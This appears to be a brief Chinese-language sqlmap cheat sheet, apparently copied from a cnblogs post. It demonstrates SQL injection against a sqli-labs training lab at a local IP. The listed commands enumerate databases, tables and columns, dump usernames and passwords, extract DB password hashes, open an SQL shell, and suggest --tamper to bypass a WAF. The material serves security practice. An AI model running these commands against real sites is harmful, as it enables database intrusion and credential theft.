sqlmap -u "http://192.168.227.1/sqli-labs-master/Less-1/?id=1"
存在注入
当注入后面的参数大于2个时,需要添加双引号
sqlmap -u "http://192.168.227.1/sqli-labs-master/Less-1/?id=1&name=tom"
sqlmap -r /root/1.txt
sqlmap -u "http://192.168.227.1/sqli-labs-master/Less-1/?id=1" --dbs
sqlmap -u "http://192.168.227.1/sqli-labs-master/Less-1/?id=1" -D security --tables
sqlmap -u "http://192.168.227.1/sqli-labs-master/Less-1/?id=1" -D security -T users --columns
sqlmap -u "http://192.168.227.1/sqli-labs-master/Less-1/?id=1" -D security -T users -C username,password --dump
sqlmap -u "http://192.168.227.1/sqli-labs-master/Less-1/?id=1" --users
sqlmap -u "http://192.168.227.1/sqli-labs-master/Less-1/?id=1" --passwords
sqlmap -u "http://192.168.227.1/sqli-labs-master/Less-1/?id=1" --current-db
sqlmap -u "http://192.168.227.1/sqli-labs-master/Less-1/?id=1" --current-user
sqlmap -u "http://192.168.227.1/sqli-labs-master/Less-1/?id=1" --is-dba
sqlmap -u "http://192.168.227.1/sqli-labs-master/Less-1/?id=1" --roles
sqlmap -u "http://192.168.227.1/sqli-labs-master/Less-1/?id=1" --sql-shell
可以使用--tamper参数绕过waf
原文:https://www.cnblogs.com/observering/p/13519848.html